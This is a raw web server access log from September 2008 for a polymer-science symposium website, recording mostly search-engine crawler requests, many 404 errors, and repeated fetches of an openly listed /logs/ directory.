74.6.22.174 - - [08/Sep/2008:12:10:42 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [08/Sep/2008:12:10:42 -0400] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
205.178.184.154 - - [08/Sep/2008:12:20:58 -0400] "GET / HTTP/1.1" 200 322 "-" "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
205.178.184.154 - - [08/Sep/2008:12:20:58 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
205.178.184.154 - - [08/Sep/2008:12:37:15 -0400] "GET /logs HTTP/1.1" 301 335 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" 0 www.geil-symposium.com
205.178.184.154 - - [08/Sep/2008:12:37:15 -0400] "GET /logs/ HTTP/1.1" 200 381 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" 0 www.geil-symposium.com
66.249.67.193 - - [08/Sep/2008:14:04:56 -0400] "GET /images/ZeissLogo.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
77.57.206.252 - - [08/Sep/2008:14:38:59 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "CHEMSE/Nutch-0.9 (CHEMSEcrawler; www.chemse.com; info123@chemse.com )" 0 www.geil-symposium.com
77.57.206.252 - - [08/Sep/2008:14:39:00 -0400] "GET /accommodations.html HTTP/1.0" 404 - "-" "CHEMSE/Nutch-0.9 (CHEMSEcrawler; www.chemse.com; info123@chemse.com )" 0 www.geil-symposium.com
130.76.32.23 - - [08/Sep/2008:15:17:31 -0400] "GET /publications.html HTTP/1.1" 404 - "http://www.google.com/search?hl=en&q=%22Anelastic+deformation+of+a+thermoplastic-matrix+fiber+composite+at+elevated+temperature%22&btnG=Google+Search&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 (CK-zz) Firefox/2.0.0.16" 0 www.geil-symposium.com
165.249.0.62 - - [08/Sep/2008:15:56:36 -0400] "GET /images/candle1.jpg HTTP/1.1" 404 - "http://74.125.95.104/search?q=cache:12xdz4Z7zKsJ:www.2spi.com/catalog/geil/+Phillip+H.+Geil&hl=en&ct=clnk&cd=2&gl=us" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1; MS-RTC LM 8)" 0 www.geil-symposium.com
72.44.38.53 - - [08/Sep/2008:18:19:10 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" 0 www.geil-symposium.com
87.101.244.8 - - [08/Sep/2008:18:48:00 -0400] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
202.160.179.35 - - [08/Sep/2008:21:19:33 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [08/Sep/2008:21:19:34 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
208.80.194.44 - - [08/Sep/2008:23:02:41 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={A1867BE4-F04F-4D76-8AD9-0642D8785988}; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; SpamBlockerUtility 4.8.4)" 0 www.geil-symposium.com
69.58.178.36 - - [09/Sep/2008:00:21:36 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
69.58.178.36 - - [09/Sep/2008:00:21:37 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
69.58.178.36 - - [09/Sep/2008:00:21:38 -0400] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
69.58.178.36 - - [09/Sep/2008:00:21:39 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
69.58.178.36 - - [09/Sep/2008:00:21:40 -0400] "GET /logs/access.log HTTP/1.1" 200 54091 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
69.58.178.36 - - [09/Sep/2008:00:21:41 -0400] "GET /logs/error.log HTTP/1.1" 200 38945 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12; ips-agent) Gecko/20050922 Fedora/1.0.7-1.1.fc4 Firefox/1.0.7" 0 www.geil-symposium.com
65.214.45.190 - - [09/Sep/2008:00:37:31 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
65.214.45.190 - - [09/Sep/2008:00:37:31 -0400] "GET /publications.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
74.6.22.106 - - [09/Sep/2008:00:37:53 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.106 - - [09/Sep/2008:00:37:53 -0400] "GET /Scholarship.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
65.55.209.30 - - [09/Sep/2008:10:08:53 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.209.30 - - [09/Sep/2008:10:08:53 -0400] "GET / HTTP/1.1" 200 326 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
86.128.177.48 - - [09/Sep/2008:10:25:58 -0400] "GET /publications.html HTTP/1.1" 404 - "-" "Mozilla/4.5 [en] (Win98; I)" 0 www.geil-symposium.com
74.6.22.106 - - [09/Sep/2008:10:53:26 -0400] "GET /logs/access.log HTTP/1.0" 200 55819 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
82.161.231.16 - - [09/Sep/2008:11:07:18 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/2.0 (compatible; MSIE 3.0B; Windows NT)" 0 www.geil-symposium.com
206.163.123.217 - - [09/Sep/2008:14:01:12 -0400] "GET / HTTP/1.1" 200 322 "http://geil-symposium.com/" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" 0 www.geil-symposium.com
206.163.123.217 - - [09/Sep/2008:14:01:12 -0400] "GET /logs HTTP/1.1" 301 335 "http://geil-symposium.com/logs" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" 0 www.geil-symposium.com
206.163.123.217 - - [09/Sep/2008:14:01:13 -0400] "GET /logs/ HTTP/1.1" 200 381 "http://geil-symposium.com/logs" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" 0 www.geil-symposium.com
206.163.123.217 - - [09/Sep/2008:14:01:14 -0400] "GET /logs/error.log HTTP/1.1" 200 40389 "http://geil-symposium.com/logs/error.log" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" 0 www.geil-symposium.com
206.163.123.217 - - [09/Sep/2008:14:01:20 -0400] "GET /logs/access.log HTTP/1.1" 200 57107 "http://geil-symposium.com/logs/access.log" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.0.1) Gecko/20060124 Firefox/1.5.0.1" 3 www.geil-symposium.com
202.179.180.45 - - [09/Sep/2008:14:57:07 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [09/Sep/2008:14:57:10 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
85.72.70.154 - - [09/Sep/2008:18:29:41 -0400] "GET / HTTP/1.1" 200 326 "http://www.google.gr/search?hl=el&sa=X&oi=spell&resnum=0&ct=result&cd=1&q=Geil+University&spell=1" "Mozilla/5.0 (Windows; U; Windows NT 6.0; el; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" 0 www.geil-symposium.com
85.72.70.154 - - [09/Sep/2008:18:29:43 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; el; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" 0 www.geil-symposium.com
85.72.70.154 - - [09/Sep/2008:18:29:49 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; el; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" 0 www.geil-symposium.com
74.6.22.106 - - [09/Sep/2008:22:52:08 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.106 - - [09/Sep/2008:22:52:08 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.106 - - [09/Sep/2008:22:52:08 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.42 - - [10/Sep/2008:04:35:54 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.4)" 0 www.geil-symposium.com
74.6.22.106 - - [10/Sep/2008:10:59:25 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.106 - - [10/Sep/2008:10:59:26 -0400] "GET /logs/access.log HTTP/1.0" 200 59436 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
192.28.2.17 - - [10/Sep/2008:14:13:55 -0400] "GET /publications.html HTTP/1.1" 404 - "http://www.google.com/search?hl=en&q=polymer+morphology+lamellae&start=20&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
192.28.2.17 - - [10/Sep/2008:14:13:55 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
131.107.0.111 - - [10/Sep/2008:16:37:38 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
66.249.72.109 - - [10/Sep/2008:20:27:20 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.72.109 - - [10/Sep/2008:20:27:20 -0400] "GET /images/DaikinLogo.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
68.142.212.174 - - [11/Sep/2008:04:34:53 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" 0 www.geil-symposium.com
68.142.212.174 - - [11/Sep/2008:04:34:53 -0400] "GET /images/mselogo.jpg HTTP/1.0" 404 - "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" 0 www.geil-symposium.com
68.142.212.174 - - [11/Sep/2008:05:08:55 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" 0 www.geil-symposium.com
68.142.212.174 - - [11/Sep/2008:05:08:55 -0400] "GET /images/mselogo.jpg HTTP/1.0" 404 - "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)" 0 www.geil-symposium.com
38.99.13.124 - - [11/Sep/2008:08:28:49 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
74.6.22.106 - - [11/Sep/2008:09:52:25 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.106 - - [11/Sep/2008:09:52:25 -0400] "GET /logs/error.log HTTP/1.0" 200 43995 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.104 - - [11/Sep/2008:09:53:05 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.104 - - [11/Sep/2008:09:53:05 -0400] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.104 - - [11/Sep/2008:09:53:05 -0400] "GET /logs/ HTTP/1.0" 200 369 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.40 - - [11/Sep/2008:10:08:42 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {6B980E38-88BA-9E38-EC11-3D790BF078D7}; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
77.57.206.252 - - [11/Sep/2008:11:49:58 -0400] "GET /Registration.html HTTP/1.0" 404 - "-" "CHEMSE/Nutch-0.9 (CHEMSEcrawler; www.chemse.com; info123@chemse.com )" 0 www.geil-symposium.com
74.6.8.104 - - [11/Sep/2008:14:34:58 -0400] "GET /logs/error.log HTTP/1.0" 200 44474 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.104 - - [11/Sep/2008:15:33:44 -0400] "GET /logs/access.log HTTP/1.0" 200 63094 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
202.179.180.45 - - [11/Sep/2008:17:20:16 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [11/Sep/2008:17:20:22 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
198.49.81.49 - - [11/Sep/2008:18:37:05 -0400] "GET /publications.html HTTP/1.1" 404 - "http://www.google.com/search?hl=en&client=firefox-a&channel=s&rls=org.mozilla:en-US:official&q=infrared+dichroism,+polyurethane&start=30&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" 0 www.geil-symposium.com
198.49.81.49 - - [11/Sep/2008:18:37:05 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" 0 www.geil-symposium.com
198.49.81.49 - - [11/Sep/2008:18:37:08 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" 0 www.geil-symposium.com
74.6.22.106 - - [12/Sep/2008:02:20:00 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.106 - - [12/Sep/2008:02:20:00 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
202.108.7.214 - - [12/Sep/2008:03:06:25 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
202.108.7.214 - - [12/Sep/2008:03:06:26 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
208.80.194.49 - - [12/Sep/2008:03:59:25 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Hotbar 2.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
66.249.72.109 - - [12/Sep/2008:04:01:42 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.72.109 - - [12/Sep/2008:04:01:42 -0400] "GET /images/AdvancedSurfaceMicroscopyLogo.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
208.111.154.16 - - [12/Sep/2008:05:22:55 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.22.106 - - [12/Sep/2008:08:13:03 -0400] "GET /publications.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.106 - - [12/Sep/2008:09:56:31 -0400] "GET /logs/error.log HTTP/1.0" 200 46900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.16 - - [12/Sep/2008:09:58:38 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [12/Sep/2008:09:58:38 -0400] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.22.106 - - [12/Sep/2008:14:33:55 -0400] "GET /logs/access.log HTTP/1.0" 200 66647 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.16 - - [12/Sep/2008:15:15:28 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [12/Sep/2008:15:15:28 -0400] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
77.57.206.252 - - [12/Sep/2008:16:13:50 -0400] "GET /Sponsors.html HTTP/1.0" 404 - "-" "CHEMSE/Nutch-0.9 (CHEMSEcrawler; www.chemse.com; info123@chemse.com )" 0 www.geil-symposium.com
68.227.232.3 - - [12/Sep/2008:18:42:37 -0400] "GET /transportation.html HTTP/1.1" 404 - "http://www.google.com/search?hl=en&rlz=1T4DKUS_enUS275US275&q=o%27hare+champaign+transportation&start=10&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
77.57.206.252 - - [12/Sep/2008:22:52:51 -0400] "GET /Scholarship.html HTTP/1.0" 404 - "-" "CHEMSE/Nutch-0.9 (CHEMSEcrawler; www.chemse.com; info123@chemse.com )" 0 www.geil-symposium.com
208.111.154.16 - - [13/Sep/2008:00:00:48 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [13/Sep/2008:00:00:48 -0400] "GET /Venue.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.8.114 - - [13/Sep/2008:03:09:05 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.114 - - [13/Sep/2008:03:09:05 -0400] "GET /Registration.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
202.160.180.31 - - [13/Sep/2008:07:36:37 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [13/Sep/2008:07:36:39 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
66.34.204.26 - - [13/Sep/2008:10:22:05 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [13/Sep/2008:10:22:06 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [13/Sep/2008:10:22:06 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
208.111.154.16 - - [13/Sep/2008:10:50:13 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [13/Sep/2008:10:50:14 -0400] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
76.179.43.119 - - [13/Sep/2008:12:32:12 -0400] "GET /images/candle1.jpg HTTP/1.1" 404 - "-" "Mozilla/3.0 (compatible; Indy Library)" 0 www.geil-symposium.com
74.6.8.114 - - [13/Sep/2008:14:51:38 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.114 - - [13/Sep/2008:14:51:39 -0400] "GET /logs/access.log HTTP/1.0" 200 70474 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
208.80.194.45 - - [13/Sep/2008:19:56:41 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; VZ_IE6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
74.6.8.114 - - [13/Sep/2008:21:42:19 -0400] "GET /accommodations.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
77.91.224.13 - - [13/Sep/2008:23:12:23 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 0 www.geil-symposium.com
77.91.224.13 - - [14/Sep/2008:09:12:34 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 0 www.geil-symposium.com
74.6.8.114 - - [14/Sep/2008:10:33:03 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.114 - - [14/Sep/2008:10:33:03 -0400] "GET /logs/error.log HTTP/1.0" 200 51725 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
88.113.3.57 - - [14/Sep/2008:10:40:58 -0400] "GET /robots.txt HTTP/1.0" 404 - "http://majestic12.co.uk/bot.php?I=470D1B78BC-000000C02C1D1151-geil-symposium_com" "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)" 0 www.geil-symposium.com
88.113.3.57 - - [14/Sep/2008:10:41:04 -0400] "GET / HTTP/1.1" 200 322 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)" 0 www.geil-symposium.com
208.80.194.32 - - [14/Sep/2008:11:23:27 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S05395109370018)" 0 www.geil-symposium.com
69.247.29.122 - - [14/Sep/2008:13:25:05 -0400] "GET / HTTP/1.1" 200 326 "http://www.google.com/search?hl=en&newwindow=1&as_q=polymers+dupont+knoxville&as_epq=&as_oq=&as_eq=&num=30&lr=lang_en&as_filetype=&ft=i&as_sitesearch=&as_qdr=all&as_rights=&as_occt=any&cr=&as_nlo=&as_nhi=&safe=off" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
69.247.29.122 - - [14/Sep/2008:13:25:10 -0400] "GET / HTTP/1.1" 200 326 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
69.247.29.122 - - [14/Sep/2008:13:25:12 -0400] "GET /logs HTTP/1.1" 301 343 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
69.247.29.122 - - [14/Sep/2008:13:25:12 -0400] "GET /logs/ HTTP/1.1" 200 385 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
